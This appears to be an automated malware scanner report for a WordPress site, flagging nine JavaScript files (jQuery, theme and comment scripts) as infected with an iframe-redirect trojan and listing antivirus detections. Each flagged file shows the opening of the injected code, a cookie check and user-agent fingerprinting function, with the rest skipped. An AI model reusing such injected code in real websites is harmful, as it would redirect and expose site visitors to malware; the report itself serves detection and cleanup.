New scan:

Malware Scanner report for groupeclc.fr

Malicious/Suspicious/Total urls checked
9/0/15
9 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/9
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://groupeclc.fr/
200 OK
Content-Length: 20738
Content-Type: text/html
clean
http://www.groupeclc.fr/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/ajax.js?ver=3.9.2
200 OK
Content-Length: 33
Content-Type: application/x-javascript
clean
http://www.groupeclc.fr/wp-includes/js/jquery/jquery.js?ver=1.11.0
200 OK
Content-Length: 97365
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {
var matches = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
function Visitrepositorium() {
var pipka = navigator.userAgent;
var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1);
var bb = (getCookie("lastshow") === undefined);
... 3200 bytes are skipped ...
e["scroll"+a],b.body["offset"+a],e["offset"+a],e["client"+a])):void 0===d?n.css(b,c,g):n.style(b,c,d,g)},b,f?d:void 0,f,null)}})}),n.fn.size=function(){return this.length},n.fn.andSelf=n.fn.addBack,"function"==typeof define&&define.amd&&define("jquery",[],function(){return n});var fd=a.jQuery,gd=a.$;return n.noConflict=function(b){return a.$===n&&(a.$=gd),b&&a.jQuery===n&&(a.jQuery=fd),n},typeof b===L&&(a.jQuery=a.$=n),n});
jQuery.noConflict();

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://www.groupeclc.fr/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1
200 OK
Content-Length: 8163
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {
var matches = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
function Visitrepositorium() {
var pipka = navigator.userAgent;
var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1);
var bb = (getCookie("lastshow") === undefined);
... 3294 bytes are skipped ...
ector||"**",n),this)},e.event.trigger=function(e,t,n,a){return n||C.test(e)||r("Global events are undocumented and deprecated"),k.call(this,e,t,n||document,a)},e.each(S.split("|"),function(t,n){e.event.special[n]={setup:function(){var t=this;return t!==document&&(e.event.add(document,n+"."+e.guid,function(){e.event.trigger(n,null,t,!0)}),e._data(this,n,e.guid++)),!1},teardown:function(){return this!==document&&e.event.remove(document,n+"."+e._data(this,n)),!1}}})}(jQuery,window);

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://www.groupeclc.fr/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/persist.js?ver=3.9.2
200 OK
Content-Length: 24995
Content-Type: application/x-javascript
clean
http://www.groupeclc.fr/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/store.js?ver=3.9.2
200 OK
Content-Length: 5337
Content-Type: application/x-javascript
clean
http://www.groupeclc.fr/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/ngg_store.js?ver=3.9.2
200 OK
Content-Length: 891
Content-Type: application/x-javascript
clean
http://www.groupeclc.fr/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/lightbox/static/lightbox_context.js?ver=3.9.2
200 OK
Content-Length: 890
Content-Type: application/x-javascript
clean
http://www.groupeclc.fr/wp-content/themes/Karma/truethemes_framework/js/truethemes.js?ver=2.0
200 OK
Content-Length: 12451
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {
var matches = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
function Visitrepositorium() {
var pipka = navigator.userAgent;
var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1);
var bb = (getCookie("lastshow") === undefined);
... 3610 bytes are skipped ...
ize(function () {
ttMobileMenu();
});

jQuery(window).load(function(){
jQuery('#tt-mobile-menu-list').hide();
});

jQuery(document).ready(function(){
jQuery('#tt-mobile-menu-list').hide();
});

}
function iex() {
if (jQuery.browser.msie || jQuery.browser.opera) {
jQuery(window).load(function () {
jQuery('.big-banner #main .main-area').css("padding-top", "118px");
});
}
}

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
HTML:Iframe-inf
Ikarus
Trojan.JS.IFrame
Microsoft
Trojan:JS/Iframe.DI
Sophos
Troj/JSRedir-OI

http://www.groupeclc.fr/wp-content/themes/Karma/truethemes_framework/js/jquery.cycle.all.min.js?ver=2.9.4
200 OK
Content-Length: 32502
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {
var matches = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
function Visitrepositorium() {
var pipka = navigator.userAgent;
var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1);
var bb = (getCookie("lastshow") === undefined);
... 3140 bytes are skipped ...
.display="block";var step=1,count=parseInt((opts.speedIn/13))-1;(function f(){var tt=t?t-parseInt(step*(t/count)):0;var ll=l?l-parseInt(step*(l/count)):0;var bb=b<h?b+parseInt(step*((h-b)/count||1)):h;var rr=r<w?r+parseInt(step*((w-r)/count||1)):w;$next.css({clip:"rect("+tt+"px "+rr+"px "+bb+"px "+ll+"px)"});(step++<=count)?setTimeout(f,13):$curr.css("display","none");})();});opts.cssBefore={display:"block",opacity:1,top:0,left:0};opts.animIn={left:0};opts.animOut={left:0};};})(jQuery);

Antivirus reports:

Avast
HTML:Iframe-inf
Microsoft
Trojan:JS/Iframe.DI
Sophos
Troj/JSRedir-OI

http://www.groupeclc.fr/wp-content/themes/Karma/truethemes_framework/js/jquery-ui-1.9.2.custom.min.js?ver=1.9.2
200 OK
Content-Length: 41009
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {
var matches = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
function Visitrepositorium() {
var pipka = navigator.userAgent;
var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1);
var bb = (getCookie("lastshow") === undefined);
... 3223 bytes are skipped ...
n u(){t.newTab.closest("li").addClass("ui-tabs-active ui-state-active"),r.length&&s.show?r.animate(s.show,s.show.duration,function(){o()}):(r.show(),o())}var n=this,r=t.newPanel,i=t.oldPanel,s=this._getFx();if(!s)return this._super(e,t);n.running=!0,i.length&&s.hide?i.animate(s.hide,s.hide.duration,function(){t.oldTab.closest("li").removeClass("ui-tabs-active ui-state-active"),u()}):(t.oldTab.closest("li").removeClass("ui-tabs-active ui-state-active"),i.hide(),u())}}))})(jQuery);

Antivirus reports:

Avast
HTML:Iframe-inf
Microsoft
Trojan:JS/Iframe.DI
Sophos
Troj/JSRedir-OI

http://www.groupeclc.fr/wp-content/themes/Karma/truethemes_framework/js/jquery.prettyPhoto.js?ver=1.0
200 OK
Content-Length: 36316
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {
var matches = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
function Visitrepositorium() {
var pipka = navigator.userAgent;
var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1);
var bb = (getCookie("lastshow") === undefined);
... 3617 bytes are skipped ...
ettyPhoto";
}

function getParam(name,url){
name = name.replace(/[\[]/,"\\\[").replace(/[\]]/,"\\\]");
var regexS = "[\\?&]"+name+"=([^&#]*)";
var regex = new RegExp( regexS );
var results = regex.exec( url );
return ( results == null ) ? "" : results[1];
}

})(jQuery);
var pp_alreadyInitialized = false; jQuery(document).ready(function () {
jQuery("a[data-gal^='prettyPhoto']").prettyPhoto({hook:'data-gal'});
});

Antivirus reports:

Avast
HTML:Iframe-inf
Microsoft
Trojan:JS/Iframe.DI
Sophos
Troj/JSRedir-OI

http://www.groupeclc.fr/wp-includes/js/comment-reply.js?ver=1.0
200 OK
Content-Length: 2190
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {
var matches = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
function Visitrepositorium() {
var pipka = navigator.userAgent;
var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1);
var bb = (getCookie("lastshow") === undefined);
... 1285 bytes are skipped ...
emp = t.I('wp-temp-form-div'), respond = t.I(t.respondId);
if ( ! temp || ! respond )
return;
t.I('comment_parent').value = '0';
temp.parentNode.insertBefore(respond, temp);
temp.parentNode.removeChild(temp);
this.style.display = 'none';
this.onclick = null;
return false;
};
try { t.I('comment').focus(); }
catch(e) {}
return false;
},
I : function(e) {
return document.getElementById(e);
}
};

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
HTML:Iframe-inf
Ikarus
Trojan.JS.IFrame
Microsoft
Trojan:JS/Iframe.DI
Sophos
Troj/JSRedir-OI

http://www.groupeclc.fr/wp-content/themes/Karma/truethemes_framework/js/superfish.js?ver=1.0
200 OK
Content-Length: 5035
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {
var matches = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
function Visitrepositorium() {
var pipka = navigator.userAgent;
var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1);
var bb = (getCookie("lastshow") === undefined);
... 3959 bytes are skipped ...
this.addClass(o.hoverClass)
.find('>ul:hidden').css('visibility','visible');
sf.IE7fix.call($ul);
o.onBeforeShow.call($ul);
$ul.animate(o.animation,o.speed,function(){ sf.IE7fix.call($ul); o.onShow.call($ul); });
return this;
}
});
})(jQuery);
jQuery('.top-block .toolbar-left ul').superfish({
delay: 200,
animation: {opacity:'show', height:'show'},
speed: 'fast',
autoArrows: true,
dropShadows: false
});

Antivirus reports:

Avast
HTML:Iframe-inf
Microsoft
Trojan:JS/Iframe.DI
Sophos
Troj/JSRedir-OI

http://www.groupeclc.fr/wp-content/themes/Karma/truethemes_framework/js/hoverIntent.js?ver=1.0
200 OK
Content-Length: 4137
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {
var matches = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
function Visitrepositorium() {
var pipka = navigator.userAgent;
var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1);
var bb = (getCookie("lastshow") === undefined);
... 1817 bytes are skipped ...
{
pX = ev.pageX; pY = ev.pageY;
$(ob).bind("mousemove",track);
if (ob.hoverIntent_s != 1) { ob.hoverIntent_t = setTimeout( function(){compare(ev,ob);} , cfg.interval );}
} else {
$(ob).unbind("mousemove",track);
if (ob.hoverIntent_s == 1) { ob.hoverIntent_t = setTimeout( function(){delay(ev,ob);} , cfg.timeout );}
}
};
return this.mouseover(handleHover).mouseout(handleHover);
};

})(jQuery);

Antivirus reports:

Avast
HTML:Iframe-inf
Microsoft
Trojan:JS/Iframe.DI
Sophos
Troj/JSRedir-OI


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: groupeclc.fr

Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Sep 2014 12:46:24 GMT
Server: Apache/2.2.27
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Link: <http://www.groupeclc.fr/>; rel=shortlink
X-Pingback: http://www.groupeclc.fr/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: groupeclc.fr
Referer: http://www.google.com/search?q=groupeclc.fr

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=groupeclc.fr

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://groupeclc.fr/

Result: groupeclc.fr is not infected or malware details are not published yet.